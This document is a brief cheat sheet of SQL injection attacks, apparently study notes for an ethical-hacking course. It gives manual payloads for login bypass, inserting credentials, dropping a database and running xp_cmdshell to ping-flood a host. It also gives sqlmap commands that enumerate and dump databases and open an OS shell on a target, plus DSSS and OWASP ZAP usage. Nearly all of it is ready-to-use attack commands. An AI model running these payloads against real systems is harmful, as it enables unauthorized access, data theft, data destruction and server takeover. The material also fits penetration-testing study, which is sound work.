
## SQL Injection 15

    # Manual SQLi

	admin' or 1=1--
	admin'; insert into login values('test','hacker123'); --
	admin'; create database pagalworld; --
	admin'; drop database pagalworld; --
	a'; exec master..xp_cmdshell 'ping www.certifiedhacker.com -t -l 65000'; --

    # SQLmap
	sqlmap --url <vulernerable-url> --cookie "" --dbs
	sqlmap --url <vulernerable-url> --cookie "" -D "database" --tables
	sqlmap --url <vulernerable-url> --cookie "" --D "database" -T "table_name" --dump
	sqlmap --url <vulernerable-url> --cookie "" --D "database" -T "table_name" --dump-all
	sqlmap --url <vulernerable-url> --cookie "" --D "database" -T "table_name" --os-shell
	sqlmap --url <vulernerable-url> --cookie "" --D "database" -T "table_name" --os-pwn

	sqlmap -u "http://192.168.44.40" --crawl=3 --level=5 --risk=3 --dbs
	sqlmap --url http://10.10.95.177/blood/blood.php --cookie="" --crawl=3 --level=5 --risk=3 --dbs
	
	POST-REQUEST
		sqlmap -r req.txt -p blood_group --dbs	(-p is testable parameter for the post request)

	GET-REQUEST
		sqlmap -u https://testsite.com/page.php?id=7 --dbs

    # DSSS
	python3 dsss.py -u "http://www.target.com/page.php?id=1" --cookie=""

    # OwaspZAP (detect SQLi)
	Automated Scan -> Go to "Alerts" -> SQL Injection


